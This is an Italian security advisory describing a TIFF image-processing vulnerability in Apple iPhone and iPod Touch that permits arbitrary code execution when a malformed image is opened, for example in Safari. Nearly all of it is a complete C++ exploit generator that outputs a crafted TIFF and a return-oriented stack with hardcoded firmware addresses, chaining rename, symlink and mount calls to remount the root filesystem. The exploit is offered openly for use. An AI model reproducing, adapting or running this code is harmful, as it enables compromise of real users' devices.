Una vulnerabilità in Apple iPod Touch e iPhone può essere sfruttata da un utente malintenzionato per compromettere il dispositivo vulnerabile.
La stessa è causata da un errore nel processamento delle immagini TIFF e può essere sfruttata al fine di eseguire codice arbitrario quando una particolare immagine TIFF malformata viene aperta, ad esempio mediante il browser Safari.
È di seguito disponibile il codice exploit.
Exploit:
// Header names were lost in extraction; restored from usage
// (printf/putchar, strcmp/strlen, std::vector).
#include <cstdio>
#include <cstring>
#include <vector>
using namespace std;
// Writes n copies of the byte p to stdout (p defaults to NUL).
// Nothing is written when n <= 0.
void print_pad(int n, char p = '\0') {
    for (int remaining = n; remaining > 0; --remaining) {
        putchar(p);
    }
}
// Writes the first `size` bytes of arr to stdout as-is (embedded NULs
// included). A size <= 0 writes nothing; arr is never dereferenced then.
void print_arr(char *arr, int size) {
    if (size <= 0) {
        return;
    }
    fwrite(arr, 1, static_cast<size_t>(size), stdout);
}
// One four-byte entry of the fake stack emitted by Stack::Write().
struct Node {
    // Role of the entry: VAL is emitted verbatim, STACK is rebased against
    // the running base address, BYTES is a padding length, PTR is an index
    // into the string table. VAL is the default.
    enum NodeType { VAL, STACK, BYTES, PTR };
    NodeType type;
    // The payload, accessible either as an int or as its raw bytes.
    // NOTE(review): reading bytes[] after writing value goes through the
    // union, so the emitted byte order is the host's (little-endian on x86).
    union {
        int value;
        char bytes[4];
    };

    Node() : type(VAL), value(0) {}
    Node(int v, NodeType t = VAL) : type(t), value(v) {}
    // Copying is memberwise (type + the 4-byte union), which is exactly
    // what the compiler-generated copy constructor does.
};
// One string-table entry: the NUL-terminated text appended after the
// fake stack, and the Node that receives its computed address.
struct Ptr {
    char *str;   // a NULL str terminates the table
    Node node;   // set by Stack::Write(); initialised to 0 by the caller
};
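// Assembles the fake stack that follows the TIFF bytes: a list of Nodes
// whose values are adjusted against a running base address as they are
// added, followed by a string table addressed by PTR nodes.
struct Stack {
    // `_base` is copied, not referenced: the caller's Node keeps its
    // initial value while this object's `base` advances on every Add().
    // `_strings` must be terminated by an entry whose str is NULL.
    Stack(Node &_base, Ptr *_strings) : base(_base), strings(_strings) {}

    // Appends one entry and advances `base`:
    //   BYTES  - reserves node.value bytes of padding (base += node.value)
    //   STACK  - node.value is rebased (node.value += base.value) and then,
    //            like every other non-BYTES entry, base += 4.
    // The fall-through from STACK into default is intentional.
    void Add(Node node) {
        switch (node.type) {
            case Node::BYTES:
                base.value += node.value;
                break;
            case Node::STACK:
                node.value += base.value;
                // fall through
            default:
                base.value += 4;
        }
        stack.push_back(node);
    }

    // Emits the stack, then the strings, to stdout.
    // Single-shot: it assigns each string the current `base` and advances
    // `base` by strlen+1 per string, so a second call yields different
    // addresses. A PTR node's value is used as an unchecked index into
    // `strings`; the caller is responsible for keeping it in range.
    void Write() {
        for (int i = 0; strings[i].str; i++) {
            strings[i].node.value = base.value;
            base.value += static_cast<int>(strlen(strings[i].str) + 1);
        }
        for (std::vector<Node>::iterator it = stack.begin(), end = stack.end(); it != end; ++it) {
            switch (it->type) {
                case Node::BYTES:
                    print_pad(it->value, 0x00);
                    break;
                case Node::PTR:
                    print_arr(strings[it->value].node.bytes, 4);
                    break;
                default:
                    print_arr(it->bytes, 4);
            }
        }
        for (int i = 0; strings[i].str; i++) {
            print_arr(strings[i].str, static_cast<int>(strlen(strings[i].str) + 1));
        }
    }

    std::vector<Node> stack;  // entries in insertion order
    Node base;                // running address, advanced by Add()/Write()
    Ptr *strings;             // NULL-terminated string table (not owned)
};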
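// Writes the TIFF container followed by the two Node values it carries.
// Layout of `tif` (little-endian, 132 = 0x84 bytes in total):
//   "II", 0x002a         byte-order mark and magic 42
//   0x0000001e           offset of the first IFD (= 30, right after the
//                        22 zero bytes that follow the header)
//   0x0008               IFD entry count
//   8 entries x 12 bytes tag, type, count, value-or-offset (decoded inline)
//   0x00000000           no next IFD
// After the array: 104 zero bytes, sp (4 bytes), 12 zero bytes, pc (4 bytes).
// Values above 0x7f are cast explicitly: brace-initialising a char with
// 0xaa/0xbb/0xff is a narrowing error since C++11 on signed-char targets.
void build_tif(Node &sp, Node &pc) {
    char tif[] = {
        0x49, 0x49, 0x2a, 0x00,                       // "II", 42
        0x1e, 0x00, 0x00, 0x00,                       // first IFD at 0x1e
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00,           // 22 zero bytes
        0x08, 0x00,                                   // 8 entries
        // tag 0x0100, type 3, count 1, value 8
        0x00, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00,
        // tag 0x0101, type 3, count 1, value 8
        0x01, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00,
        // tag 0x0103, type 3, count 1, value 0xaa
        0x03, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, static_cast<char>(0xaa), 0x00, 0x00, 0x00,
        // tag 0x0106, type 3, count 1, value 0xbb
        0x06, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, static_cast<char>(0xbb), 0x00, 0x00, 0x00,
        // tag 0x0111, type 4, count 1, value 8
        0x11, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00,
        // tag 0x0117, type 4, count 1, value 0x15
        0x17, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x15, 0x00, 0x00, 0x00,
        // tag 0x011c, type 3, count 1, value 1
        0x1c, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
        // tag 0x0150, type 3, count 0xff, offset 0x84 (= sizeof(tif))
        0x50, 0x01, 0x03, 0x00, static_cast<char>(0xff), 0x00, 0x00, 0x00, static_cast<char>(0x84), 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00,                       // next IFD: none
    };
    print_arr(tif, static_cast<int>(sizeof(tif)));
    print_pad(104, 0x00);
    print_arr(sp.bytes, 4);
    print_pad(12, 0x00);
    print_arr(pc.bytes, 4);
}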
// Entry point: argv[1] selects the address set ("1.0.2" -> set 0, anything
// else -> set 1), then the TIFF bytes and the fake stack are written to
// stdout. Exits 1 with a usage line when the argument is missing.
int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: %s \n", argv[0]);
        return 1;
    }
    const int version = (!strcmp(argv[1], "1.0.2") ? 0 : 1);

    // String table; Node(i, Node::PTR) below refers to entry i.
    // The NULL entry terminates the table for Stack::Write().
    Ptr str[] = {
        { "/var/root/Media", 0 },
        { "/var/root/Oldmedia", 0 },
        { "/", 0 },
        { "hfs", 0 },
        { "/dev/disk0s1", 0 },
        { NULL, 0 },
    };

    // `stack` holds a copy of `base`; main's `base` keeps its initial value,
    // which is what build_tif() writes below.
    Node base(version == 0 ? 0x0055a638 : 0x006f7638);
    Stack stack(base, str);

    Node ldmia_r4_r0(version == 0 ? 0x310b668c : 0x3125368c);
    Node ldmia_sp_r4(0x3000adfc);
    Node ldmia_sp_r0(0x300df800);
    Node rename(0x30015530);   // shadows ::rename from <cstdio> in this scope
    Node symlink(0x30027300);
    Node mount(0x300267d0);

    build_tif(base, ldmia_r4_r0);

    // Entries are emitted in insertion order; see Stack::Add for how
    // STACK and BYTES entries are rebased against the running base.
    stack.Add(Node(0, Node::PTR));
    stack.Add(Node(1, Node::PTR));
    stack.Add(Node(20, Node::BYTES));
    stack.Add(Node(12, Node::STACK));
    stack.Add(ldmia_sp_r4);
    stack.Add(rename);

    stack.Add(Node(12, Node::STACK));
    stack.Add(Node(4, Node::BYTES));
    stack.Add(ldmia_r4_r0);

    stack.Add(Node(2, Node::PTR));
    stack.Add(Node(0, Node::PTR));
    stack.Add(Node(20, Node::BYTES));
    stack.Add(Node(12, Node::STACK));
    stack.Add(ldmia_sp_r0);
    stack.Add(symlink);

    stack.Add(Node(3, Node::PTR));
    stack.Add(Node(2, Node::PTR));
    stack.Add(Node(0x00050000, Node::VAL));
    stack.Add(Node(8, Node::STACK));
    stack.Add(mount);
    stack.Add(Node(4, Node::PTR));

    stack.Write();
    return 0;
}